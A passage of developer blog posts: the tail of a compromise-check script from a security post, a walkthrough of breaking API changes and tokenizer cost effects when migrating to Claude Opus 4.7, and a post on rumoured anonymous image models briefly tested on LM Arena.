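    print("Possible compromise, investigate:", hits)
else:
    print("No matching lock files found.")
```

A hit is grounds for a full credential rotation, not just deleting the file.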
IOCs, full technical details, and deobfuscated payload signatures have been shared with law enforcement and submitted to MalwareBazaar and VirusTotal.
Stay safe.
2026-04-16 23:00:14
Adaptive thinking is Claude Opus 4.7's only supported reasoning mode: you pass thinking: {type: "adaptive"} and the model decides how much to reason, with budget_tokens removed from the API entirely. My production trading bot threw 400 Bad Request on its first inference after I bumped claude-opus-4-6 to claude-opus-4-7 — one character in a model ID, three breaking changes attached.
Anthropic shipped Opus 4.7 on April 16 at the same sticker price as Opus 4.6: $5 per million input tokens, $25 per million output tokens. That sameness is misleading. The model ID is claude-opus-4-7, the context window is 1M tokens, max output is 128k, and knowledge cutoff is January 2026. Vision accepts 2,576-pixel long-edge images, about 3.75 megapixels, which Anthropic describes as "more than 3x as many pixels" as prior Claude models. The release is available on the Claude API, Amazon Bedrock research preview, Google Vertex AI, and Microsoft Foundry.
Flat pricing on a new tokenizer is not flat pricing. I'll get to the math in a minute, but first the three changes that matter when you flip the model ID.
Here is the code that worked on Opus 4.6 and dies on Opus 4.7.
```typescript
import Anthropic from "@anthropic-ai/sdk";

const client = new Anthropic(); // reads ANTHROPIC_API_KEY from the environment

const response = await client.messages.create({
  model: "claude-opus-4-6",
  max_tokens: 16000,
  thinking: {
    type: "enabled",
    budget_tokens: 10000,
  },
  messages: [{ role: "user", content: task }],
});

for (const block of response.content) {
  if (block.type === "thinking") {
    console.log(block.thinking);
  }
}
```
thinking.type: "enabled" and the budget_tokens field together used to mean "reason up to 10,000 tokens before answering." Opus 4.7's gateway rejects that shape with a 400. There is no deprecation shim. You get an error body complaining about thinking.type, and your workflow stops.
The replacement, from the adaptive thinking docs, looks like this.
```typescript
const response = await client.messages.create({
  model: "claude-opus-4-7",
  max_tokens: 16000,
  thinking: { type: "adaptive", display: "summarized" } as any,
  output_config: { effort: "high" } as any,
  messages: [{ role: "user", content: task }],
});
```
Three shifts. The type moves to "adaptive", which lets the model choose reasoning depth per request. Budget control migrates from integer tokens to the categorical effort field on output_config. And the SDK's TypeScript definitions have not shipped yet for these fields, so as any is the pragmatic workaround for the next few days. Opus 4.6 and Sonnet 4.6 still accept "enabled" as deprecated behavior, but anything new should target the adaptive shape to avoid back-to-back migrations.
Two side effects of adaptive worth flagging. First, interleaved thinking — reasoning between tool calls — is on by default in adaptive mode. Agent loops that previously needed a beta header now get mid-call reasoning for free, which is the concrete backing for Anthropic's "step-change improvement in agentic coding" claim. Second, thinking itself is OFF by default on Opus 4.7. Drop the thinking field entirely and you get no reasoning blocks — not an error, just worse answers. If you are migrating existing code, add an explicit thinking: {type: "adaptive"} at every call site rather than relying on the old implicit default.
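One way to enforce the explicit-thinking rule at every call site is a small wrapper that injects the adaptive config whenever the field is missing. A sketch under the request shapes shown in this post — the helper name and types are mine, not the SDK's:

```typescript
// Opus 4.7 leaves thinking OFF when the field is omitted, so force it explicitly.
type ThinkingConfig = { type: "adaptive"; display?: "summarized" | "omitted" };

type CreateParams = {
  model: string;
  max_tokens: number;
  thinking?: ThinkingConfig;
  messages: Array<{ role: string; content: string }>;
};

// Hypothetical helper: pass every request through this before calling the API.
function withAdaptiveThinking(params: CreateParams): CreateParams {
  return {
    ...params,
    // Explicit, not implicit: an omitted `thinking` silently disables reasoning.
    thinking: params.thinking ?? { type: "adaptive", display: "summarized" },
  };
}

const params = withAdaptiveThinking({
  model: "claude-opus-4-7",
  max_tokens: 16000,
  messages: [{ role: "user", content: "task" }],
});
console.log(params.thinking); // the adaptive config is now set explicitly
```

Routing every call site through one function also gives you a single place to flip display or effort later, instead of another grep-and-edit pass.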
The second breaking change does not throw. The default value of thinking.display used to be "summarized" on Opus 4.6. On Opus 4.7 the default is "omitted", which means block.thinking comes back as an empty string.
I caught this in LLMTrio, which has a "show Claude's reasoning" disclosure UI. Thirty minutes after rolling out the Opus 4.7 bump, the first report came in: the panel had gone blank. The thinking blocks were still in the response — type thinking, full signature field — but the text payload was empty. The fix is one line: pass display: "summarized" explicitly.
The encrypted signature field still travels regardless of display. Multi-turn continuity — feeding prior reasoning into the next turn — works independently. Anthropic's rationale for "omitted" as the new default is faster time-to-first-text-token when streaming. That makes sense for chat UIs where the user never sees reasoning anyway. It bites hard for research tools, agent observability dashboards, and any product that surfaces a reasoning trace.
This is the migration where a code reviewer really earns their keep. The compiler does not help; every call site needs the explicit display flag, and missing ones will only surface in UI bug reports.
The third change you only catch by measuring. Opus 4.7 ships a new tokenizer. Anthropic's migration docs describe the input token count as "roughly 1.0–1.35x depending on content type." Prices held flat, so the invoice for an identical workload can rise by up to 35 percent.
In worked numbers: a workload that metered 500M input tokens per month on Opus 4.6, costing $2,500 per month, can meter as 675M input tokens on Opus 4.7 in the worst case, costing $3,375 per month. $875 delta per month from tokenizer swap alone. The models overview makes the same claim from the other direction: 1M tokens holds ~750k English words on Opus 4.6 but only ~555k on Opus 4.7. That ratio is basically 1.35x.
My own corpus confirms the ceiling is real for Korean text and typed code. The same prompt that metered 2,312 tokens on Opus 4.6 yesterday metered 3,014 tokens on Opus 4.7 today — a 1.30x ratio. My trading bot's prompts, which I broke down in Trading bot with 15 strategies, are densely typed TypeScript and saw the biggest jumps. I learned the hard way from my llmtrio caching work that you measure before you flip. This is that test, at scale.
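The arithmetic is simple enough to sketch. Assuming the flat $5 per million input tokens from above, and treating the inflation factor as a measured per-corpus number rather than a constant:

```typescript
const INPUT_PRICE_PER_M = 5; // USD per million input tokens, flat across 4.6 and 4.7

// Project monthly input cost from metered volume (in millions of tokens)
// and a tokenizer inflation factor measured on your own corpus.
function monthlyInputCost(tokensPerMonthM: number, inflation = 1.0): number {
  return tokensPerMonthM * inflation * INPUT_PRICE_PER_M;
}

const before = monthlyInputCost(500);          // 500M tokens/month on Opus 4.6
const worstCase = monthlyInputCost(500, 1.35); // same workload on 4.7, worst case
console.log(before, worstCase, worstCase - before); // 2500 3375 875
```

The point of running this against your own measured ratio (1.30x in my corpus) rather than the documented ceiling is that the invoice projection moves meaningfully between the two.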
budget_tokens is gone, so how do you tell Opus 4.7 to think harder? Through output_config.effort, which has five levels on Opus 4.7. Here is the full ladder.
| effort | availability | intended use |
|---|---|---|
| low | all models | snappy replies, tight budgets |
| medium | all models | general workloads |
| high | all models (default) | balanced reasoning |
| xhigh | Opus 4.7 only | deeper reasoning short of max |
| max | all models | maximum reasoning, maximum cost |
Here is the twist. Claude Code's default effort moved to xhigh on all plans today, with no announcement and no release note in the UI; the models overview only mentions that the level exists. The same commands you ran yesterday will feel slower today, and combined with the tokenizer inflation, monthly spend can jump visibly. If cost is a concern, set effort to high at the project level and reach for xhigh deliberately, not by default.
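In API code that means pinning effort explicitly instead of inheriting defaults. A sketch using the request shape from the examples above — verify the field names against the shipped SDK before copying:

```typescript
// Effort ladder per the table above; xhigh is Opus 4.7 only.
type Effort = "low" | "medium" | "high" | "xhigh" | "max";

// Build a request body with an explicit effort; default to high, escalate deliberately.
function requestWithEffort(task: string, effort: Effort = "high") {
  return {
    model: "claude-opus-4-7",
    max_tokens: 16000,
    thinking: { type: "adaptive" as const },
    output_config: { effort },
    messages: [{ role: "user" as const, content: task }],
  };
}

console.log(requestWithEffort("summarize this diff").output_config.effort);   // prints high
console.log(requestWithEffort("audit this proof", "xhigh").output_config.effort); // prints xhigh
```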
Claude Code also shipped a unified interface for multiple projects and a Microsoft Word beta integration in the same release. I am writing a book about Claude Code right now, tracked in Writing a Claude Code book with Claude Code, and the xhigh default has already earned a callout in the next draft.
On the same day, Anthropic launched an in-house AI design tool for websites and presentations. The Information broke the story on April 14, and Figma and Wix shares closed between 2 and 4 percent lower that session. This is the moment Opus 4.7 stops being a model bump and becomes part of a product stack expansion. If you have ever spent a weekend producing five landing page variants by hand, that work compresses to a single agent call on the new stack.
One more item worth a mention: Anthropic announced Claude Mythos Preview, an invitation-only model available through Project Glasswing for defensive cybersecurity research. The UK AI Safety Institute reported that Mythos "autonomously executed a 32-step network simulation typically requiring 20 human hours" at rates not previously benchmarked. Mythos is not Opus 4.7 — it is a separate model — but the two ship together as evidence that Anthropic's agent story is accelerating.
The order that let me ship the bump without burning a day. Find every call site that still uses thinking.type: "enabled" — ripgrep "enabled" under your thinking usage — and swap to "adaptive", removing budget_tokens. Where your UI surfaces reasoning, add display: "summarized" explicitly. Meter a representative sample of production prompts against the new tokenizer and multiply by your usage to project the invoice impact before traffic shifts. For Claude Code, set effort to high at the project level and only escalate to xhigh on tasks that clearly warrant deeper reasoning. Then flip the model ID.
The cheap alternatives are worth naming. You can stay on Opus 4.6, which still serves the old "enabled" shape as deprecated behavior — fine for a week or two while you prep. You can route some traffic to Sonnet 4.6 for cost-sensitive paths. You can opt into adaptive on Opus 4.6 first, so the thinking-shape migration happens independently of the model swap. What you cannot do is bump the model ID and hope no code noticed.
After running through this migration on three different projects today, my blunt read is that Opus 4.7 is better approached as an API redesign with a model upgrade attached, rather than a drop-in version increment. The reasoning quality on agentic coding is noticeably better — I can feel it in Claude Code's tool sequencing — and the 1M-context window with interleaved thinking by default is genuinely nice. But the invoice story is tighter than the announcement suggests, and the display default is a trap.
What did your budget_tokens code do when you bumped to 4-7 — silent behavior change or loud 400?
One character in a model ID can drag three breaking changes behind it.
Full Korean analysis on spoonai.me.
2026-04-16 23:00:06
I opened LM Arena on a Tuesday night to A/B two image models. The one on the left had no name — just packingtape-alpha. Three renders in, I knew what I was looking at.
LM Arena is the blind-comparison leaderboard for text-to-image models at arena.ai. "duct-tape" is the community nickname for three anonymous models — packingtape-alpha, maskingtape-alpha, gaffertape-alpha — that appeared there in early April 2026 and were pulled within hours. OpenAI has not confirmed ownership, but the community has settled on the inference that this is the next-generation OpenAI image model, widely rumored as GPT-Image 2.
I want to walk through why I think this matters for solo builders, what the community actually verified during the brief test window, what the alternatives look like right now, and what it changes in my own stack. Keep one thing in mind throughout: strong community inference is not the same as confirmation. I'll flag the line every time it matters.
My three active projects are a saju app, a trading bot, and a coffee-chat platform. Every one of them runs on a multi-tool image pipeline: generate a base render, import to Figma to fix the text, retouch skin or lighting in a second tool, export the thumbnail. Ten to thirty minutes per asset, per platform. The binding constraint has been text-in-image. Every current model garbles strings longer than a few words, which means every marketing asset has a mandatory edit step after generation.
That binding constraint is what duct-tape appears to dissolve. If the tests the community reproduced are anywhere near representative, the first step in that pipeline stops needing the second, third, and fourth steps. That is not a productivity improvement, that is a shape change. I started redesigning my asset workflow the week the tests dropped, before any launch, because the cost of waiting and being wrong is small and the cost of waiting and being right is that my competitors get there first.
Here is the clean version of what is confirmed. Three anonymous models with adhesive-tape codenames appeared on LM Arena. They were live for a fraction of a day. The community dubbed the family "duct-tape." Hundreds of blind A/B renders were captured and screenshotted before the models disappeared. There is no official statement from OpenAI.
Here is what is inference, strong but unofficial. The rendering fingerprint — a specific softness in specular highlights, a particular handling of sans-serif text — matches the gpt-image-1 and gpt-image-1.5 lineage. DALL-E retires on May 12, 2026, which forces OpenAI to have a replacement ready. Analyst estimates center on a May to June 2026 public launch. The working name "GPT-Image 2" is a rumor and may not be the final product name.
Three capability themes came out of the reproduced tests. Text rendering was the loudest. A fake OpenAI homepage prompt returned a nav bar, button labels, and body copy with correct spelling across roughly a dozen words. A League of Legends screenshot mock rendered KDA numbers, item names, and cooldown timers at pixel accuracy. World knowledge was the second. Prompts naming specific locations — a "Shibuya Scramble at 4 AM in the rain" test circulated widely — returned building layouts, chain logos, and lane counts that matched Street View. Photorealism was the third. Skin, eye highlights, and hair-end specular handling all improved noticeably versus gpt-image-1.5. Korean testers zeroed in on Hangul rendering, and @choi.openai on Threads captured the mood when he wrote that Nano Banana Pro had been out-muscled for the first time.
One weakness carried over unchanged. Duct-tape still fails the Rubik's Cube reflection test, the community benchmark for mirror-image physical correctness. Content filters also ran more aggressively than gpt-image-1.5's, with refusals on prompts that previously passed. No public API, no pricing, no SDK.
Google's Nano Banana 2 has held the LM Arena text-to-image top spot since December 2025. gpt-image-1.5 is second. Midjourney v7 still wins on artistic ceiling and has about 21 million paid subscribers, but its text rendering has slipped behind gpt-image-1.5 over the past quarter. Here is the comparison I would actually use to decide what to touch in my stack today.
| Capability | duct-tape (rumored) | Nano Banana 2 | gpt-image-1.5 |
|---|---|---|---|
| In-image text | Near-perfect on ~12-word strings | Strong but inconsistent | 30–40% error on long strings |
| World knowledge / real places | Matches Street View on named scenes | Strong on Western cities | Generic, often invented |
| Photorealism | Visibly improved skin / eye / hair | Top-tier, slightly plastic | Good, AI tells remain |
| Hangul / non-English text | Reportedly excellent | Mixed | Unreliable |
| Public API availability | None | Yes | Yes |
| Pricing | Unknown | ~$0.04/image | $0.04–0.17/image |
If you are shipping product today, Nano Banana 2 plus gpt-image-1.5 in a fallback chain is the defensible choice. If your pipeline's bottleneck is in-image text, and you can afford to wait until mid-to-late May, the smart move is to design the duct-tape API integration now and leave a stubbed adapter in place.
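Here is roughly what that stubbed adapter looks like: code against a narrow interface today, keep the current chain behind it, and swap in a real client if and when the model ships. Every name below is hypothetical, since there is no public duct-tape API or SDK:

```typescript
// Narrow interface the pipeline codes against; implementations are swappable.
interface ImageModel {
  name: string;
  generate(prompt: string): Promise<string>; // returns an image URL or path
}

// Placeholder for the unreleased model: always fails until an API exists.
class StubDuctTapeModel implements ImageModel {
  name = "duct-tape (stub)";
  async generate(_prompt: string): Promise<string> {
    throw new Error("duct-tape API not yet public");
  }
}

// Fallback chain: try each model in order until one succeeds.
async function generateWithFallback(models: ImageModel[], prompt: string): Promise<string> {
  for (const model of models) {
    try {
      return await model.generate(prompt);
    } catch {
      // fall through to the next model in the chain
    }
  }
  throw new Error("all image models failed");
}

// Today's chain: stub first (always falls through), current model behind it.
const fallbackModel: ImageModel = {
  name: "gpt-image-1.5 (placeholder)",
  generate: async (p) => `rendered:${p}`,
};

generateWithFallback([new StubDuctTapeModel(), fallbackModel], "hero banner")
  .then((url) => console.log(url)); // prints rendered:hero banner
```

The payoff is that launch day becomes a one-line change to the model array instead of a pipeline rewrite.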
The viral test that hit my feed was the fake OpenAI homepage prompt. A community tester wrote a prompt describing a landing page for a new OpenAI image model: center hero with "GPT Image 2" headline in sans-serif, subheadline in smaller weight, a horizontal nav with six labeled links, a primary CTA button, and footer text. The render came back with every label in the right position, spelled correctly, typographically consistent. The button had a hover shadow. The footer had a legal line that did not quite match a real one but was spelled cleanly. Nothing in that render would have failed a first glance from a designer.
The equivalent output from gpt-image-1.5 would have rendered maybe three of the six nav labels correctly, butchered the subheadline, and inserted a fake-looking OpenAI logo. Either output would still need to go through Figma for the actual build, but the duct-tape render would go through as a reference, not as something to fix. That is the hinge.
Three practical changes I am making now. First, I am writing my new asset pipeline with a single image-generation step and a lightweight review step instead of a multi-tool chain. The new shape assumes the model gets text right. If duct-tape or equivalent ships, the pipeline is already aligned. If it slips, my fallback keeps the multi-tool chain available for text-heavy assets only.
Second, I am putting a Korean small-business SaaS hypothesis back into my prototype queue. Hangul rendering has been the binding constraint on image-AI product adoption in that segment for years, and a duct-tape-class API opens it. I wrote about the saju app's visual language in my Three.js cosmic design post, and the same reasoning applies — when the visual tooling gets good enough to ship without hand-editing, new product surfaces open.
Third, I am not rewriting my trading bot's UI generation scripts. The bot renders strategy reports as images for a Telegram channel, and the current pipeline with gpt-image-1.5 plus a small Figma overlay is stable. I covered the bot's architecture in the trading bot 15 strategies writeup, and the image step is mid-priority compared to execution logic. A better image model does not change what needs to be true for that product to work.
A thought about the broader arc. Model releases used to be judged on whether they were "prettier." That axis is dead. What matters now is how many steps in your workflow disappear when the model ships. This is the same pattern I wrote about in prompting is programming — the useful question is no longer "is the output better" but "what does the output let me stop doing."
If duct-tape is really GPT-Image 2, what's the first thing in your workflow that becomes unnecessary?
An anonymous model appeared on the leaderboard and was gone by morning. Nothing is confirmed. Those few hours still reset the next month of my roadmap.
Read the Korean version on spoonai.me.